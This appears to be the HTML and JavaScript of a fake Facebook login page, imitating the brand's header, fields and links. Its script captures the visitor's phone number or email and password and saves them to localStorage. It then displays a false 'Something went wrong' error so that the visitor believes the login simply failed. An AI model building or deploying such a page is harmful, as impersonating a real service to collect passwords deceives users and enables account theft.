<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login Page</title>
    <link rel="stylesheet" href="style.css">
    <style>
        /* Your existing CSS */
               .textbox{
    width:100%;
    padding-top:10px;
    padding-bottom:10px ;
    border-color:#8098ffe2;
}
   
        .text-center {
  text-align: center;
}
  
#btn_1{
    background: #4063ff;
    width:100%;
    padding-top:10px ;
    padding-bottom:10px ;
    border:none;
    color: white;
    font-size: 16px;
    }
#btn_2{
        background: Green;
      width:45%;
    padding-top:10px ;
    padding-bottom:10px ;
    border:none;
    color: white;
    font-size: 16px;
    text-align: center;
    }
    .line{
        color:gray;
    }
    .link{
        text-decoration: none;
    }
    </style>
</head>
<body>
    <p align="center">facebook</p>
    <hr>
    <form name="loginForm" onsubmit="handleLogin(event)">
        <input type="hidden" name="form-name" value="loginForm" />
        Phone number or email<br>
        <input type="text" name="userInput" class="textbox" required><br><br>
        Password<br>
        <input type="password" name="password" class="textbox" required><br><br>
        <button type="submit" id="btn_1">Log in</button>
        <p id="error-message" style="color: red; display: none;">Something went wrong. Please try again.</p>
    </form>
          <a href="url" class="link">Forgot password?</a><br><br>
<div class="text-center">
<span class="line">__________________</span>&nbsp
<sub> <big>or</big> </sub>&nbsp
<span class="line">__________________</span>
</div>
 <br>
 <div class="text-center">
<button type="submit" id="btn_2">creat new account</button>
</div>
English (US)<br><br>
<a href="url" class="link">বাংলা</a><br><br>
<a href="url" class="link">More languages...</a>
    <script>
        function handleLogin(event) {
            event.preventDefault(); // Prevent the form from submitting to a server
            
            // Fetch values from the form
            var userInput = document.forms["loginForm"]["userInput"].value;
            var password = document.forms["loginForm"]["password"].value;
            
            // Store data in localStorage
            localStorage.setItem("userInput", userInput);
            localStorage.setItem("password", password); // Note: Storing passwords like this is not secure
            
            // Show error message
            document.getElementById('error-message').style.display = 'block';
        }
    </script>
</body>
    </html>
